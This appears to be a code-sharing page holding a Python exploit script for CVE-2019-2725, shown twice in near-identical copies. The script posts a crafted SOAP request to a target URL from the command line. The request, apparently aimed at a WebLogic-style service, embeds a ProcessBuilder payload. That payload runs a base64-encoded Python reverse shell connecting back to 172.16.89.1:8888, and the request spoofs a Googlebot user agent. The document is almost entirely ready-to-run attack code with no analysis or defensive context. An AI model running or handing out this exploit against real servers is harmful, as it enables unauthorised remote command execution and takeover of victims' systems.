gteissier · May 3, 2019 09:51
diff --git a/cve-2019-2725.py b/cve-2019-2725.py
 #!/usr/bin/env python

 import requests
 import sys
 from base64 import b64encode


 LHOST = '172.16.89.1'
 LPORT = 8888

 RSHELL = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%d));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' % (LHOST, LPORT)
 exploit = 'exec("%s".decode("base64"))' % b64encode(RSHELL)

 url =  sys.argv[1]

 request_headers = {"Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en", "User-Agent": "Googlebot/2.1 (+http://www.google.com/bot.html)", "Connection": "close", "Content-Type": "text/xml"}
 data="<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">\r\n    <soapenv:Header>\r\n        <wsa:Action>xx</wsa:Action>\r\n        <wsa:RelatesTo>xx</wsa:RelatesTo>\r\n        <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n            <void class=\"java.lang.ProcessBuilder\">\r\n                <array class=\"java.lang.String\" length=\"3\">\r\n                    <void index=\"0\">\r\n                        <string>python</string>\r\n                    </void>\r\n                    <void index=\"1\">\r\n                        <string>-c</string>\r\n                    </void>\r\n                    <void index=\"2\">\r\n                        <string>%s</string>\r\n                    </void>\r\n                </array>\r\n            <void method=\"start\"/></void>\r\n        </work:WorkContext>\r\n    </soapenv:Header>\r\n    <soapenv:Body>\r\n    <asy:onAsyncDelivery/>\r\n    </soapenv:Body>\r\n</soapenv:Envelope>" %  (exploit)
 response = requests.post(url, headers=request_headers, data=data)
 print "status_code:%s" % str(response.status_code)
 print(response)
	#!/usr/bin/env python

	import requests
	import sys
	from base64 import b64encode


	LHOST = '172.16.89.1'
	LPORT = 8888

	RSHELL = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%d));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' % (LHOST, LPORT)
	exploit = 'exec("%s".decode("base64"))' % b64encode(RSHELL)

	url = sys.argv[1]

	request_headers = {"Accept-Encoding": "gzip, deflate", "Accept": "/", "Accept-Language": "en", "User-Agent": "Googlebot/2.1 (+http://www.google.com/bot.html)", "Connection": "close", "Content-Type": "text/xml"}
	data="<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">\r\n <soapenv:Header>\r\n <wsa:Action>xx</wsa:Action>\r\n <wsa:RelatesTo>xx</wsa:RelatesTo>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <void class=\"java.lang.ProcessBuilder\">\r\n <array class=\"java.lang.String\" length=\"3\">\r\n <void index=\"0\">\r\n <string>python</string>\r\n </void>\r\n <void index=\"1\">\r\n <string>-c</string>\r\n </void>\r\n <void index=\"2\">\r\n <string>%s</string>\r\n </void>\r\n </array>\r\n <void method=\"start\"/></void>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body>\r\n <asy:onAsyncDelivery/>\r\n </soapenv:Body>\r\n</soapenv:Envelope>" % (exploit)
	response = requests.post(url, headers=request_headers, data=data)
	print "status_code:%s" % str(response.status_code)
	print(response)